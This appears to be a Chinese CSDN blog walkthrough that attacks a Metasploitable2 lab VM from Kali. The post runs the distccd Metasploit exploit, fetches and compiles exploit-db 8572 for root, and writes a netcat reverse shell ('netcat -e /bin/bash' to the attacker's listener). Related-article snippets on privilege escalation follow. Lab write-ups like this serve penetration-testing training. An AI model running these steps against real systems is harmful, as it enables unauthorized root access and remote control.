利用本地漏洞提升权限

最新推荐文章于 2024-04-06 08:53:35 发布
最新推荐文章于 2024-04-06 08:53:35 发布
阅读量537 收藏
点赞数
分类专栏: 渗透测试 文章标签: 提升权限
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41289254/article/details/103430826
版权

环境:
kali:192.168.43.131
metasploitables2:192.168.43.132

利用的是meta2上的distccd服务的漏洞,以下将metaspolitables2简称为tb2

步骤:
1、先用nmap扫一下td2的端口(服务):
nmap -p- 192.168.43.132
2、发现distccd服务,打开msf,搜一下有没有该服务的漏洞利用程序:
msfconsole
search distccd
3、发现有一个:exploit/unix/misc/distcc_exec
use exploit/unix/misc/distcc_exec
show options
set RHOST 192.168.43.132
exploit

4、发现成功进入tb2,看下权限,发现是daemon权限:
whoami
...

5、提权
下载提升权限的exploit:www.exploit-db.com/exploits/8572
下载后将文件放到/var/www/html文件下,开启apache2服务:service apache2 start

先使用之前用msf得到的那个daemon权限的shell,来下载我们的提权exploit:
wget “http://192.168.43.131/8572.c”
然后编译一下:gcc 8572.c -o 8572

看一下exploit需要的参数,发现需要udevd netlink socket的PID,查一下:
ps aux|grep udev
注意这里得到的PID与我们需要的PID大1,需要减一个1
然后运行该程序,我们就获得了root权限

接下来,我们用tb2上的netcat程序给我们弹回一个shell回来(因为这里的提权exploit会把文件名为run的可执行文件当作其payload,所以我们构造一个run):
echo '#!/bin/bash' > run
echo '/bin/netcat -e /bin/bash 192.168.43.133 31333' >> run

然后在kali上开启监听:
nc -vv -l -p 31333
在tb2上再次运行一下:./8572 PID值
会发现kali上的nc得到了结果

zwish
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
提升权限_通过组合漏洞进行权限提升
weixin_30191947的博客
01-12 454
介绍这篇文章主要讲述了由NCC Group研究人员所发现的两个通过COM本地服务进行非法提权的漏洞。第一个漏洞CVE-2019-1405是COM服务中的一个逻辑错误,可让本地普通用户以LOCAL SERVICE身份执行任意命令。第二个漏洞CVE-2019-1322是一个简单的服务配置错误,可让本地SERVICE组中的任何用户重新配置以SYSTEM权限运行的服务(此漏洞也被其他研究人员发现)。当以上...
利用本地漏洞的***
weixin_34185320的博客
08-10 90
1.读取metabase.xml/web.xml /password.properities敏感文件,得知www路径,coldfusion路径,coldfusion后台加密密码 2.本地包含coldfusion日志,写cfm一句话,得到WEBSHELL http://www.ypt.com/index.cfm?action=../../../../../../../....
「 典型安全漏洞系列 」09.权限提升漏洞详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
04-06 1260
权限提升漏洞是一种常见的安全漏洞,它允许攻击者利用系统或应用程序中的漏洞,获取原本不具有的更高权限,从而进行恶意行为。这种漏洞通常发生在用户输入、身份验证、访问控制等方面存在缺陷,导致攻击者能够绕过预期的权限限制,获取更多的系统资源或执行更高权限的操作。访问控制是按用户身份及其所属的某项定义组来限制用户访问某些信息或功能的一种技术。在web应用程序的上下文中,访问控制依赖于身份验证和会话管理。
本地提权
weixin_45605313的博客
06-01 604
本地提权windowSysinternalsSuite->PsExec.exe利用系统命令进程注入pinjector.exe(隐蔽)fgdumpmimikatzwin缓存密码linux脏牛suid/etc/passwd文件的配置不当sudo组 window 常见window权限: 普通用户:user 管理员:administrator 系统:system admin->system SysinternalsSuite->PsExec.exe 微软发布的一套非常强大的免费工具程序集 Ps
Kali学习 | 权限提升:5.2 本地权限提升
qq_43233085的博客
01-14 595
Kali学习 | 权限提升:5.2 本地权限提升介绍操作步骤 介绍 上一节介绍了窃取目标系统令牌,现在来介绍窃取令牌后如何提升在目标系统上的权限提升本地权限可以使用户访问目标系统,并且进行其他的操作,如创建用户和组等。 操作步骤 同样的实现本地权限提升,也需要连接到Meterpreter会话,具体操作就不再介绍。 (1)启动Meterpreter会话。执行命令如下所示: msf auxilia...
权限提升
sunxingstar的博客
08-24 894
常见的提权的种类 • 操作系统本身的提权 • 利用数据库进行提权 • 文件系统配置不当进行提权 • 利用第三方的软件进行提权 系统漏洞提权 windows本地溢出提权 • systeminfo查看补丁修复情况 • 查找可写目录(目录执行权限) • 上传cmd命令程序(当前用户权限) • 上传本地提权程序 • 调用cmd执行提权程序 • whoami确认获取系统权限 ms09-012 KB9...
Linux polkit本地权限提升漏洞和libpcap抓包实时监控tcpdump
04-26
个人使用,适合centos7以上版本的linux系统
Windows XP 核心驱动 secdrv.sys 本地权限提升漏洞
07-17
漏洞可以让任意用户提升到 SYSTEM 权限利用漏洞可以获得本地的最高权限。该漏洞利用工具为“Windows Local Privilege Escalation Vulnerability Exploit”,我们可以解压后,在命令提示符窗口下进入该文件夹...
如何利用三个漏洞组合达成Discord RCE漏洞 .pdf
09-05
为了演示这个过程,通常需要精心构造的恶意输入,利用这些漏洞的交互来逐步提升权限,最终达到在受害者机器上运行自定义代码的目的。 在发现这些问题后,负责任的安全研究人员会遵循负责任的披露原则,及时将漏洞...
网络漏洞扫描技术PPT课件
07-07
漏洞的分类方式多样,常见的有:本地攻击漏洞和远程攻击漏洞,前者针对已获得本地权限的攻击者,后者则通过网络进行;根据漏洞存在的位置,可以分为操作系统、网络协议、应用程序等不同类别;再者,根据潜在威胁和被...
最新MySQL数据库漏洞情况通报
09-10
如果未及时修复此漏洞,攻击者无论是本地还是远程,都可以通过正常请求或恶意注入的方式,修改配置文件,以管理员权限执行任意代码,对服务器进行完全控制。这可能导致数据泄露、系统瘫痪等一系列严重后果。 三、...
Linux Polkit 权限提升漏洞解决方案
bocco的博客
01-28 3084
近日,安全狗应急响应中心监测 Linux Polkit 被披露出存在权限提升漏洞漏洞编号CVE-2021-4034。可导致恶意用户权限提升等危害。
漏洞利用与提权(一):提权基础
黎先生的博客
02-15 4085
1. 提权概述 1.1 概述 提权顾名思义就是提高自己在系统中的权利。渗透测试以获取系统的最高权限为目标,首先通过寻找漏洞,获取WebShell权限,然后进行提权。 提权可分为: 操作系统提权 Windows Linux Samba Android 应用程序提权 Seru-u Radmin SQL Server 2000/2005、MySQL、Oracle Java IE 例如Wi...
Metasploit的本地漏洞利用
xxx9686的博客
09-17 202
这个很简单的理解,本地例如: RAR ZIP 播放器等等,当我们用MSF生成漏洞文件后,别人用特定的工具打开,就会中马。当别人用eZip Wizard 3.0打开以后 就会中我们的PAYLOAD 后门。打开UB 1 ,我们来利用ZIP吧,启动METASPLOIT 搜索rar。
提升权限_Win 10计划任务本地权限提升0 day POC
weixin_39879522的博客
01-12 151
漏洞利用是自去年8月起安全研究人员SandboxEscaper发现的第5个Windows 漏洞利用。SandboxEscaper利用漏洞利用可以进行本地权限提升,获取SYSTEM和TrustedInstaller等特权用户对温泉的完全控制权限。 定时任务文件这次,SandboxEscaper关注的还是计划任务工具(Task Scheduler),并用它来从其他系统中导入遗留任务。在W...
Linux 本地权限提升漏洞
做自己喜欢的事,并将其发挥到极致!
03-30 1967
文章目录前言一、漏洞描述二、漏洞级别三、影响范围四、漏洞细节五、漏洞类型六、本地复现七、修复建议 前言 本文章仅用于漏洞复现和技术研究,切勿非法攻击,出现任何事故与本作者无关,切记! 一、漏洞描述 Linux内核中 net/ipv4/esp4.c 和 net/ipv6/esp6.c中的 IPsec ESP 转换代码中发现堆缓冲区溢出漏洞。该漏洞允许具有正常用户权限的本地攻击者覆盖内核中的堆对象,最终获取root权限。 二、漏洞级别 高危 三、影响范围 Linux kernel < 5.17
权限提升(SET)
qq_44111753的博客
12-13 425
1、使用假冒令牌 1)、启动meterpreter会话,执行命令 sessions -i 1 2)、use incognito加载incognito模块,然后列举出令牌 3)、help查看帮助信息,了解列举令牌的命令 4)、list_tokens -u 列举出所有的令牌 5)、impersonate_token命令假冒用户进行攻击 impersonate_token user 2、本地权限提升 1)、启动meterpreter会话 sessions -i 1 2)、使用getsystem命令提升本地权限
Linux polkit本地权限提升漏洞
刘杨造梦的博客
05-01 309
漏洞描述 在 polkit 的 pkexec 程序中发现了一个本地权限提升漏洞。pkexec 应用程序是一个 setuid 工具,旨在允许非特权用户根据预定义的策略以特权用户身份运行命令。由于当前版本的 pkexec 无法正确处理调用参数计数,并最终会尝试将环境变量作为命令执行。攻击者可以通过控制环境变量,从而诱导 pkexec 执行任意代码。利用成功后,可导致非特权用户获得管理员权限。CVE-2021-4034 polkit 的 pkexec 存在本地权限提升漏洞,已获得普通权限的攻击者可通过此漏洞
五种利用本地包含漏洞的方式
weixin_33694172的博客
09-25 998
本文讲的是五种利用本地包含漏洞的方式,本地文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include fuction.php?>就可以调用内部定义的函数。 本...
kali如何提升用户权限
最新发布
06-06
3. 利用文件系统权限漏洞:检查是否存在文件或目录权限设置不当,可以通过修改文件所有者或权限提升权限。 4. 使用rootkit技术:虽然这不是合法手段,但rootkit可以隐藏进程、改变日志记录等方式间接提升权限。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值